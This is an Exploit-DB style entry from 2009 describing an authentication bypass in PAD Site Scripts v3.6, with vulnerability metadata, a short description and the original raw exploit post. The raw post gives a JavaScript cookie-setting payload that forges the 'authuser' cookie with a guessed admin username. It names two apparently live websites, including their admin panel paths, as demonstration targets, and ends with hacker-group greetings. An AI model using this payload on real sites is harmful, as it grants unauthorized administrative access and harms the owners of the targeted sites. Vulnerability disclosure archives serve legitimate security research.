PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability

vendor:

PAD Site Scripts

by:

Mr.tro0oqy

7,5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: PAD Site Scripts

Affected Version From: 3.6

Affected Version To: 3.6

Patch Exists: NO

Related CWE: N/A

CPE: a:pad_site_scripts:pad_site_scripts:3.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability

A vulnerability in PAD Site Scripts v3.6 allows an attacker to gain access to the admin panel by setting the authuser cookie to the username of the admin account. This can be done by using a JavaScript code such as 'javascript:document.cookie="authuser=[demo];path=/"' and then guessing the username of the admin account. Once the username is guessed, the JavaScript code can be used again to set the authuser cookie to the username of the admin account, followed by the URL of the admin panel.

Mitigation:

Ensure that the authuser cookie is set securely and is not vulnerable to manipulation.

Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
javascript:document.cookie="authuser=[demo];path=/";

[demo]= Guess the username to the login

demo:
-----
Username for this site 'demo'

javascript:document.cookie="authuser=demo;path=/";

http://demo.pad-site-scripts.com/sysop

demo2:
------
Username for this site 'admin'

javascript:document.cookie="authuser=admin;path=/";

http://www.unlimitedpcdownloads.com/sysop/


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE

Syriahacker.net [ArAb Acadmy Security]  

all my Friends

# milw0rm.com [2009-05-19]